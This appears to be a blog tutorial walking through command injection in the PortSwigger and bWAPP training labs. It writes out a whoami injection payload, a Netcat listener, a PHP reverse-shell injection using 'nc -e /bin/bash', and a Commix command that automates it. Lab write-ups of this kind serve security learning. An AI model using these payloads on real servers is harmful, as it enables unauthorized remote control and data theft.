Master Code Injection Attacks, Ethically! 🔐

Introduction

Imagine being able to inject your own code into a website, granting you remote control over an entire server. This is the power of a Code Injection Attack. As one of the most severe vulnerabilities, it allows attackers to exploit web applications by injecting malicious code into backend systems, gaining access to valuable data or even full control over the server.

In today’s article, we will walk through two live labs demonstrating Code Injection Attacks. First, we will use the PortSwigger Lab to inject simple OS commands. Then, we will elevate the attack in the BWAP Lab, where we’ll automate the process using the powerful tool Commix to gain full remote access. Grab your coffee and follow along as we dive into these exciting labs!

What is a Code Injection Attack?

A Code Injection Attack occurs when an attacker exploits an input field in a web application to run unauthorized code on a server. It usually targets poorly secured input forms like search bars, login forms, or data entry points. The goal is to inject code written in the server’s backend language—whether it’s PHP, Python, or Node.js—thus executing commands on the server.

For instance, with code injection, you can execute commands like whoami to identify the current server user, or escalate the attack by injecting code that opens a reverse shell, providing full remote access. The potential impact of a successful Code Injection Attack ranges from stealing sensitive data to taking full control over the server, making it a critical security flaw.

Lab 1: Code Injection in PortSwigger Lab

In the first lab, we’ll use PortSwigger Lab to execute a basic command injection attack. Here, we’ll inject the whoami command into the productID parameter to see which user is running the server.

Steps:

1. Set up Burp Suite to intercept the traffic between the web application and the server.

2. Modify the productID parameter in the request to include the command injection payload:

   productID=1+&whoami#&storeId=1

3. Execute the command and observe the response from the server, which reveals the current user (e.g., peter-tGLt5E).

Code Example (Burp Suite Command Injection):

POST /product/stock HTTP/1.1
Host: ace51f2e1e13420ac0d9be100072005a.web-security-academy.net
...
productID=1+&whoami#&storeId=1

In this case, the server responds with the username peter-tGLt5E. While this may seem like a small piece of information, it is a vital first step in understanding the privileges and permissions of the current server user.

Lab 2: Gaining Remote Access in BWAP Lab using Commix

In this lab, we’ll perform a more advanced Code Injection Attack using the BWAP Lab. Our goal is to gain full remote control of the server by injecting a PHP reverse shell command. This will allow us to open a backdoor on the server and interact with it through a terminal. To automate the process, we will be using Commix, a tool that simplifies command injection attacks.

Why Use Commix?

Commix automates the process of finding and exploiting vulnerabilities in web applications. Instead of manually testing each input field, Commix will find injection points and allow us to execute commands directly on the server. This makes it ideal for situations like this, where repetitive tasks such as testing for vulnerabilities can slow you down.

Steps:

1. Set up Netcat on your machine to listen for incoming connections:

   nc -nlvp 4444

   This opens a listener on port 4444 on your machine, which will be used to catch the reverse shell connection from the vulnerable server.

2. Prepare the reverse shell command: In the vulnerable web application, inject the following PHP command to open a reverse shell:

   /phpi.php?message=test; system("nc 192.168.0.000 4444 -e /bin/bash");

   This command tells the server to connect back to your machine (192.168.0.000) on port 4444 and open a bash shell for remote access.

3. Execute the reverse shell injection using Commix: With Commix, automate the injection of the PHP reverse shell command:

   commix --url="<https://192.168.0.001/bWAPP/phpi.php?message=test>; system('nc 192.168.0.000 4444 -e /bin/bash')" --cookie="security_level=0"

   Commix will find the vulnerable injection point and execute the reverse shell command, connecting the server back to your listener.

4. Gain full access: Once the reverse shell is open, you can now run commands on the remote server as if you were physically present:

   whoami
   ls
   pwd

   This gives you full control over the server, allowing you to navigate directories, execute commands, and further escalate privileges if necessary.

Code Snippets

Netcat Listener:

nc -nlvp 4444

PHP Reverse Shell Injection:

system("nc 192.168.0.117 4444 -e /bin/bash");

Commix Command:

commix --url="<https://192.168.0.109/bWAPP/phpi.php?message=test>; system('nc 192.168.0.117 4444 -e /bin/bash')" --cookie="security_level=0"

By using Commix and Netcat, we’ve successfully taken control of the target machine. This demonstrates the potential danger of code injection vulnerabilities when attackers can escalate privileges and take full control of a server.

Conclusion

In this article, we explored the power of Code Injection Attacks through two practical labs. First, we used PortSwigger Lab to run a basic whoami command, providing insights into the server environment. Then, we escalated the attack in the BWAP Lab, using Commix and Netcat to gain full remote access.

Whether you’re a security professional or a curious learner, understanding Code Injection Attacks is vital for protecting systems from these vulnerabilities. Don’t forget to like, subscribe, and check out the video for a more detailed walkthrough. Stay secure, and stay curious!